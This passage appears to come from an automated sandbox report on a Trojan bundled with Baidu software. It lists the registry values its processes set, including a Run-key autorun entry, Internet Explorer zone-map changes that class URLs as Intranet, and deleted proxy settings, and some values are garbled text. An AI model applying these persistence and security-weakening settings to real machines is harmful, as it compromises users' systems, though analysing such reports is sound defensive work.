"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process BDASWDeskGuide.exe:228 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 90 64 2D C6 DB FA 11 12 56 48 44 31 AE 6D 28"

The process baiduanTray.exe:3012 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 3F AC CC F2 8B DE 80 3F E4 AE 38 22 BE 7B BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\3.0.0.3971]
"BaiduAnBugRpt.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¥Ã‚Â¼Ã¢â‚¬Å¡ÃƒÂ¥Ã‚Â¸Ã‚Â¸ÃƒÂ¦Ã…Â Ã‚Â¥ÃƒÂ¥Ã¢â‚¬ËœÃ…Â ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"PAUTime" = "1800000"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process BindEx.exe:1568 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 73 0F 4B 1E C7 02 FB 9E F2 DE C5 B8 BE F6 87"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{00890530-6A9F-4be2-B1BB-73F01E2BB986}]

The process BindEx.exe:1040 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"F1023_s_30803.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢ÃƒÂ¥Ã‚Â®Ã¢â‚¬Â°ÃƒÂ¨Ã‚Â£Ã¢â‚¬Â¦ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"G1023_s_70904.exe" = "ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¥Ã‚Â®Ã¢â‚¬Â°ÃƒÂ¨Ã‚Â£Ã¢â‚¬Â¦ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 CC E4 19 CB 4A 8C C9 BA 1B 43 AC F1 C5 2A 84"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"

The process setup.tmp:1976 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoRepair" = "1"
"QuietUninstallString" = "%Program Files%\baidu\unins000.exe /SILENT"

"DisplayVersion" = "1.5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Selected Tasks" = "startup,bind1"
"Inno Setup: Icon Group" = "baidu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"MinorVersion" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Deselected Tasks" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"InstallDate" = "20141106"
"DisplayName" = "baidu version 1.5"
"UninstallString" = "%Program Files%\baidu\unins000.exe"
"Inno Setup: User" = "%CurrentUserName%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"BindEx.exe" = "BindEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Language" = "english"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 27 89 69 F4 4C 37 EB 05 44 47 DD 12 31 25 4B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: App Path" = "%Program Files%\baidu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC2}_is1]
"Inno Setup: Setup Version" = "5.5.3 (a)"
"InstallLocation" = "%Program Files%\baidu\"
"MajorVersion" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"baidu" = "%Program Files%\baidu\BindEx.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process regsvr32.exe:2652 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D6 47 F1 94 FF 73 43 F8 6A 8D DE B3 72 87 EC"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process regsvr32.exe:1520 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\BDSWShellExt.BDSWShellExtMenu]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\TypeLib]
"(Default)" = "{70891BDB-3BE3-45A9-96B6-184ABA962091}"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "PSFactoryBuffer"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\NumMethods]
"(Default)" = "3"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\ProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKCR\CLSID\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\InProcServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"
"ThreadingModel" = "Both"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}]
"(Default)" = "IBDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1\CLSID]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}\ProxyStubClsid32]
"(Default)" = "{9FC9D48D-C233-4FAB-99C1-46CE5A3AD105}"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\AppID\{A8B81847-1462-4756-9D4A-F506BC5361CD}]
"(Default)" = "BDSWShellExt"

[HKCR\*\shellex\ContextMenuHandlers\ABDSWShellExt]
"(Default)" = "{11292110-6F8D-4D56-863C-44902A1E7880}"

[HKCR\AppID\BDSWShellExt.DLL]
"AppID" = "{A8B81847-1462-4756-9D4A-F506BC5361CD}"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0]
"(Default)" = "BDSWShellExt 1.0 Type Library"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\0\win32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{11292110-6F8D-4D56-863C-44902A1E7880}" = "BDSWShellExtMenu Class"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDSWShellExt.dll"

[HKCR\BDSWShellExt.BDSWShellExtMenu\CurVer]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu.1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 71 9E 3C 0D 63 E2 61 C2 FB D3 E1 0A 4F 6A D0"

[HKCR\CLSID\{11292110-6F8D-4D56-863C-44902A1E7880}\VersionIndependentProgID]
"(Default)" = "BDSWShellExt.BDSWShellExtMenu"

[HKCR\BDSWShellExt.BDSWShellExtMenu.1]
"(Default)" = "BDSWShellExtMenu Class"

[HKCR\TypeLib\{70891BDB-3BE3-45A9-96B6-184ABA962091}\1.0\HELPDIR]
"(Default)" = ""

The process regsvr32.exe:2920 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F F6 38 0A 7D 97 9D D3 DF 05 A4 B3 C6 06 2B 3A"

[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}\InprocServer32]
"(Default)" = "%Program Files%\Baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll"
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{85E0B1AA-04FA-11D1-B7DA-00A0C90348D6}]
"(Default)" = "UÃƒÂ§Ã¢â‚¬ÂºÃ‹Å“ÃƒÂ©Ã‹Å“Ã‚Â²ÃƒÂ¦Ã…Â Ã‚Â¤"

The process BDALeakfixer.exe:3188 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 76 B7 E6 15 79 BC 6A 18 C6 B8 43 45 A3 7A B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduAn.exe:3824 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\3.0.0.3971\BDAFileHelper.exe -file=%1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 7C 15 E4 69 33 2F 19 AE 2E 6D 77 26 B5 CD FC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process BaiduAn.exe:1952 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C E8 9A 45 08 DD CF BE DB 4A 22 26 34 B7 10 4E"

The process BaiduSdBugRpt.exe:2180 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 62 36 76 0D 94 71 92 3D B2 54 6F 43 D7 63 CA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process BaiduSdUpdate.exe:2680 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 55 CD F2 62 64 E0 18 C7 E4 9C BC CE 56 0E B5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduSdUpdate.exe:2228 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 66 9F 73 E1 8D 2C 1C B8 99 FB 78 3A 3A 3E 9E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

